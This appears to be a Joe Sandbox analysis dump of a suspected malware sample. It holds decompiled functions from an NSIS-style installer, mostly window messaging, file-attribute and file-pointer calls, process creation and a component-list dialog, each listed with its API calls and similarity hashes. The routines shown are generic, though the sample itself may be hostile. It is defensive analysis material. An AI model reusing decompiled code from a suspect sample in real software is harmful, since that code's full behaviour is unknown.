                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                          • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                          • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004015A3() {
                                                                          				int _t5;
                                                                          				void* _t11;
                                                                          				int _t14;
                                                                          
                                                                          				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                          				_t14 = _t5;
                                                                          				if(_t14 == 0) {
                                                                          					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                          				return 0;
                                                                          			}







                                                                          APIs
                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 2fa47fe085563f489a8d9053a88f487a873bc99eba6c78938d0479edac3a7faf
                                                                          • Instruction ID: 18b2471a241adc9bf36c7ea4c0146ff71e49c13b27122dc007abb7967bce33ea
                                                                          • Opcode Fuzzy Hash: 2fa47fe085563f489a8d9053a88f487a873bc99eba6c78938d0479edac3a7faf
                                                                          • Instruction Fuzzy Hash: ECD01272B04104DBDB11DBA4AF0859D72A59B50364B214577E101F11D1DAB989449A19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404263(int _a4) {
                                                                          				struct HWND__* _t2;
                                                                          				long _t3;
                                                                          
                                                                          				_t2 =  *0x433eb8;
                                                                          				if(_t2 != 0) {
                                                                          					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                          					return _t3;
                                                                          				}
                                                                          				return _t2;
                                                                          			}






                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                          • Instruction ID: 095d2356c3d82f38ec3eb680651803a72dc2fc2a091610a0eb944f64c2fac8e0
                                                                          • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                          • Instruction Fuzzy Hash: 5CC09B717443007BDE118F609D85F0777546790741F14447D7344F51E0C774E450D61C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040424C(int _a4) {
                                                                          				long _t2;
                                                                          
                                                                          				_t2 = SendMessageW( *0x434ee8, 0x28, _a4, 1); // executed
                                                                          				return _t2;
                                                                          			}





                                                                          APIs
                                                                          • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                          • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                          • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                          • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040332B(long _a4) {
                                                                          				long _t2;
                                                                          
                                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                          				return _t2;
                                                                          			}





                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404239(int _a4) {
                                                                          				int _t2;
                                                                          
                                                                          				_t2 = EnableWindow( *0x42d244, _a4); // executed
                                                                          				return _t2;
                                                                          			}





                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,00404010), ref: 00404243
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                          • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                                                          • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                          • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E00401F00() {
                                                                          				void* _t9;
                                                                          				intOrPtr _t13;
                                                                          				void* _t15;
                                                                          				void* _t17;
                                                                          				void* _t20;
                                                                          				void* _t22;
                                                                          
                                                                          				_t19 = E00402C37(_t15);
                                                                          				E004052E6(0xffffffeb, _t7); // executed
                                                                          				_t9 = E00405867(_t19); // executed
                                                                          				_t20 = _t9;
                                                                          				if(_t20 == _t15) {
                                                                          					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                          				} else {
                                                                          					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
                                                                          						_t13 = E0040670D(_t17, _t20);
                                                                          						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
                                                                          							if(_t13 != _t15) {
                                                                          								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                          							}
                                                                          						} else {
                                                                          							E004061C9( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                          						}
                                                                          					}
                                                                          					_push(_t20);
                                                                          					CloseHandle();
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                                                          				return 0;
                                                                          			}










                                                                          APIs
                                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
                                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                            • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                            • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                            • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2972824698-0
                                                                          • Opcode ID: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
                                                                          • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                                          • Opcode Fuzzy Hash: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
                                                                          • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004014D7(intOrPtr __edx) {
                                                                          				long _t3;
                                                                          				void* _t7;
                                                                          				intOrPtr _t10;
                                                                          				void* _t13;
                                                                          
                                                                          				_t10 = __edx;
                                                                          				_t3 = E00402C15(_t7);
                                                                          				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
                                                                          				if(_t3 <= 1) {
                                                                          					_t3 = 1;
                                                                          				}
                                                                          				Sleep(_t3); // executed
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                                          				return 0;
                                                                          			}








                                                                          APIs
                                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
                                                                          • Instruction ID: 7b6d933f202abfdc9722895a59c2e384d2c5d1872e83ea8d1a096f69b0519c76
                                                                          • Opcode Fuzzy Hash: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
                                                                          • Instruction Fuzzy Hash: D5D0A773F141008BD710EBB8BE8949E73F8E7803293208837E102F11D1E578C8428A1C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E1000121B() {
                                                                          				void* _t3;
                                                                          
                                                                          				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
                                                                          				return _t3;
                                                                          			}





                                                                          APIs
                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocGlobal
                                                                          • String ID:
                                                                          • API String ID: 3761449716-0
                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00404C62(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                          				struct HWND__* _v8;
                                                                          				struct HWND__* _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				intOrPtr _v24;
                                                                          				signed char* _v28;
                                                                          				long _v32;
                                                                          				signed int _v40;
                                                                          				int _v44;
                                                                          				signed int* _v56;
                                                                          				signed char* _v60;
                                                                          				signed int _v64;
                                                                          				long _v68;
                                                                          				void* _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				void* _v84;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				signed int _t192;
                                                                          				intOrPtr _t195;
                                                                          				long _t201;
                                                                          				signed int _t205;
                                                                          				signed int _t216;
                                                                          				void* _t219;
                                                                          				void* _t220;
                                                                          				int _t226;
                                                                          				signed int _t231;
                                                                          				signed int _t232;
                                                                          				signed int _t233;
                                                                          				signed int _t239;
                                                                          				signed int _t241;
                                                                          				signed char _t242;
                                                                          				signed char _t248;
                                                                          				void* _t252;
                                                                          				void* _t254;
                                                                          				signed char* _t270;
                                                                          				signed char _t271;
                                                                          				long _t276;
                                                                          				int _t282;
                                                                          				signed int _t283;
                                                                          				long _t284;
                                                                          				signed int _t287;
                                                                          				signed int _t294;
                                                                          				signed char* _t302;
                                                                          				struct HWND__* _t306;
                                                                          				int _t307;
                                                                          				signed int* _t308;
                                                                          				int _t309;
                                                                          				long _t310;
                                                                          				signed int _t311;
                                                                          				void* _t313;
                                                                          				long _t314;
                                                                          				int _t315;
                                                                          				signed int _t316;
                                                                          				void* _t318;
                                                                          
                                                                          				_t306 = _a4;
                                                                          				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                          				_v8 = GetDlgItem(_t306, 0x408);
                                                                          				_t318 = SendMessageW;
                                                                          				_v20 =  *0x434f28;
                                                                          				_t282 = 0;
                                                                          				_v24 =  *0x434ef4 + 0x94;
                                                                          				if(_a8 != 0x110) {
                                                                          					L23:
                                                                          					if(_a8 != 0x405) {
                                                                          						_t285 = _a16;
                                                                          					} else {
                                                                          						_a12 = _t282;
                                                                          						_t285 = 1;
                                                                          						_a8 = 0x40f;
                                                                          						_a16 = 1;
                                                                          					}
                                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                          						_v16 = _t285;
                                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                          							if(( *0x434efd & 0x00000002) != 0) {
                                                                          								L41:
                                                                          								if(_v16 != _t282) {
                                                                          									_t231 = _v16;
                                                                          									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                                          										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                                          									}
                                                                          									_t232 = _v16;
                                                                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                                          										_t285 = _v20;
                                                                          										_t233 =  *(_t232 + 0x5c);
                                                                          										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                          											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                                          										} else {
                                                                          											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								goto L48;
                                                                          							}
                                                                          							if(_a8 == 0x413) {
                                                                          								L33:
                                                                          								_t285 = 0 | _a8 != 0x00000413;
                                                                          								_t239 = E00404BB0(_v8, _a8 != 0x413);
                                                                          								_t311 = _t239;
                                                                          								if(_t311 >= _t282) {
                                                                          									_t88 = _v20 + 8; // 0x8
                                                                          									_t285 = _t239 * 0x818 + _t88;
                                                                          									_t241 =  *_t285;
                                                                          									if((_t241 & 0x00000010) == 0) {
                                                                          										if((_t241 & 0x00000040) == 0) {
                                                                          											_t242 = _t241 ^ 0x00000001;
                                                                          										} else {
                                                                          											_t248 = _t241 ^ 0x00000080;
                                                                          											if(_t248 >= 0) {
                                                                          												_t242 = _t248 & 0x000000fe;
                                                                          											} else {
                                                                          												_t242 = _t248 | 0x00000001;
                                                                          											}
                                                                          										}
                                                                          										 *_t285 = _t242;
                                                                          										E0040117D(_t311);
                                                                          										_a12 = _t311 + 1;
                                                                          										_a16 =  !( *0x434efc) >> 0x00000008 & 0x00000001;
                                                                          										_a8 = 0x40f;
                                                                          									}
                                                                          								}
                                                                          								goto L41;
                                                                          							}
                                                                          							_t285 = _a16;
                                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                          								goto L41;
                                                                          							}
                                                                          							goto L33;
                                                                          						} else {
                                                                          							goto L48;
                                                                          						}
                                                                          					} else {
                                                                          						L48:
                                                                          						if(_a8 != 0x111) {
                                                                          							L56:
                                                                          							if(_a8 == 0x200) {
                                                                          								SendMessageW(_v8, 0x200, _t282, _t282);
                                                                          							}
                                                                          							if(_a8 == 0x40b) {
                                                                          								_t219 =  *0x42d22c;
                                                                          								if(_t219 != _t282) {
                                                                          									ImageList_Destroy(_t219);
                                                                          								}
                                                                          								_t220 =  *0x42d240;
                                                                          								if(_t220 != _t282) {
                                                                          									GlobalFree(_t220);
                                                                          								}
                                                                          								 *0x42d22c = _t282;
                                                                          								 *0x42d240 = _t282;
                                                                          								 *0x434f60 = _t282;
                                                                          							}
                                                                          							if(_a8 != 0x40f) {
                                                                          								L88:
                                                                          								if(_a8 == 0x420 && ( *0x434efd & 0x00000001) != 0) {
                                                                          									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                          									ShowWindow(_v8, _t307);
                                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                          								}
                                                                          								goto L91;
                                                                          							} else {
                                                                          								E004011EF(_t285, _t282, _t282);
                                                                          								_t192 = _a12;
                                                                          								if(_t192 != _t282) {
                                                                          									if(_t192 != 0xffffffff) {
                                                                          										_t192 = _t192 - 1;
                                                                          									}
                                                                          									_push(_t192);
                                                                          									_push(8);
                                                                          									E00404C30();
                                                                          								}
                                                                          								if(_a16 == _t282) {
                                                                          									L75:
                                                                          									E004011EF(_t285, _t282, _t282);
                                                                          									_v32 =  *0x42d240;
                                                                          									_t195 =  *0x434f28;
                                                                          									_v60 = 0xf030;
                                                                          									_v20 = _t282;
                                                                          									if( *0x434f2c <= _t282) {
                                                                          										L86:
                                                                          										InvalidateRect(_v8, _t282, 1);
                                                                          										if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t282) {
                                                                          											E00404B6B(0x3ff, 0xfffffffb, E00404B83(5));
                                                                          										}
                                                                          										goto L88;
                                                                          									}
                                                                          									_t308 = _t195 + 8;
                                                                          									do {
                                                                          										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                          										if(_t201 != _t282) {
                                                                          											_t287 =  *_t308;
                                                                          											_v68 = _t201;
                                                                          											_v72 = 8;
                                                                          											if((_t287 & 0x00000001) != 0) {
                                                                          												_v72 = 9;
                                                                          												_v56 =  &(_t308[4]);
                                                                          												_t308[0] = _t308[0] & 0x000000fe;
                                                                          											}
                                                                          											if((_t287 & 0x00000040) == 0) {
                                                                          												_t205 = (_t287 & 0x00000001) + 1;
                                                                          												if((_t287 & 0x00000010) != 0) {
                                                                          													_t205 = _t205 + 3;
                                                                          												}
                                                                          											} else {
                                                                          												_t205 = 3;
                                                                          											}
                                                                          											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                          											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                          											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                                          										}
                                                                          										_v20 = _v20 + 1;
                                                                          										_t308 =  &(_t308[0x206]);
                                                                          									} while (_v20 <  *0x434f2c);
                                                                          									goto L86;
                                                                          								} else {
                                                                          									_t309 = E004012E2( *0x42d240);
                                                                          									E00401299(_t309);
                                                                          									_t216 = 0;
                                                                          									_t285 = 0;
                                                                          									if(_t309 <= _t282) {
                                                                          										L74:
                                                                          										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                                          										_a16 = _t309;
                                                                          										_a8 = 0x420;
                                                                          										goto L75;
                                                                          									} else {
                                                                          										goto L71;
                                                                          									}
                                                                          									do {
                                                                          										L71:
                                                                          										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                          											_t285 = _t285 + 1;
                                                                          										}
                                                                          										_t216 = _t216 + 1;
                                                                          									} while (_t216 < _t309);
                                                                          									goto L74;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                          							goto L91;
                                                                          						} else {
                                                                          							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                                          							if(_t226 == 0xffffffff) {
                                                                          								goto L91;
                                                                          							}
                                                                          							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                                          							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                          								_t310 = 0x20;
                                                                          							}
                                                                          							E00401299(_t310);
                                                                          							SendMessageW(_a4, 0x420, _t282, _t310);
                                                                          							_a12 = _a12 | 0xffffffff;
                                                                          							_a16 = _t282;
                                                                          							_a8 = 0x40f;
                                                                          							goto L56;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_v32 = 0;
                                                                          					_v16 = 2;
                                                                          					 *0x434f60 = _t306;
                                                                          					 *0x42d240 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                          					_t252 = LoadBitmapW( *0x434ee0, 0x6e);
                                                                          					 *0x42d234 =  *0x42d234 | 0xffffffff;
                                                                          					_t313 = _t252;
                                                                          					 *0x42d23c = SetWindowLongW(_v8, 0xfffffffc, E0040525A);
                                                                          					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                          					 *0x42d22c = _t254;
                                                                          					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                          					SendMessageW(_v8, 0x1109, 2,  *0x42d22c);
                                                                          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                          						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                          					}
                                                                          					DeleteObject(_t313);
                                                                          					_t314 = 0;
                                                                          					do {
                                                                          						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                          						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                          							if(_t314 != 0x20) {
                                                                          								_v16 = _t282;
                                                                          							}
                                                                          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004062A4(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                                          						}
                                                                          						_t314 = _t314 + 1;
                                                                          					} while (_t314 < 0x21);
                                                                          					_t315 = _a16;
                                                                          					_t283 = _v16;
                                                                          					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                          					_push(0x15);
                                                                          					E00404217(_a4);
                                                                          					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                          					_push(0x16);
                                                                          					E00404217(_a4);
                                                                          					_t316 = 0;
                                                                          					_t284 = 0;
                                                                          					if( *0x434f2c <= 0) {
                                                                          						L19:
                                                                          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                          						goto L20;
                                                                          					} else {
                                                                          						_t302 = _v20 + 8;
                                                                          						_v28 = _t302;
                                                                          						do {
                                                                          							_t270 =  &(_t302[0x10]);
                                                                          							if( *_t270 != 0) {
                                                                          								_v60 = _t270;
                                                                          								_t271 =  *_t302;
                                                                          								_t294 = 0x20;
                                                                          								_v84 = _t284;
                                                                          								_v80 = 0xffff0002;
                                                                          								_v76 = 0xd;
                                                                          								_v64 = _t294;
                                                                          								_v40 = _t316;
                                                                          								_v68 = _t271 & _t294;
                                                                          								if((_t271 & 0x00000002) == 0) {
                                                                          									if((_t271 & 0x00000004) == 0) {
                                                                          										 *( *0x42d240 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                          									} else {
                                                                          										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                                          									}
                                                                          								} else {
                                                                          									_v76 = 0x4d;
                                                                          									_v44 = 1;
                                                                          									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                          									_v32 = 1;
                                                                          									 *( *0x42d240 + _t316 * 4) = _t276;
                                                                          									_t284 =  *( *0x42d240 + _t316 * 4);
                                                                          								}
                                                                          							}
                                                                          							_t316 = _t316 + 1;
                                                                          							_t302 =  &(_v28[0x818]);
                                                                          							_v28 = _t302;
                                                                          						} while (_t316 <  *0x434f2c);
                                                                          						if(_v32 != 0) {
                                                                          							L20:
                                                                          							if(_v16 != 0) {
                                                                          								E0040424C(_v8);
                                                                          								_t282 = 0;
                                                                          								goto L23;
                                                                          							} else {
                                                                          								ShowWindow(_v12, 5);
                                                                          								E0040424C(_v12);
                                                                          								L91:
                                                                          								return E0040427E(_a8, _a12, _a16);
                                                                          							}
                                                                          						}
                                                                          						goto L19;
                                                                          					}
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                                          • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                                          • DeleteObject.GDI32(00000000), ref: 00404D58
                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
